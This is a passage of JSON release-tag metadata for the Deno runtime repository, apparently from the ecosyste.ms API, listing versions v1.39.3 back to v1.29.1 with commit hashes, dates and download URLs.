repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"nam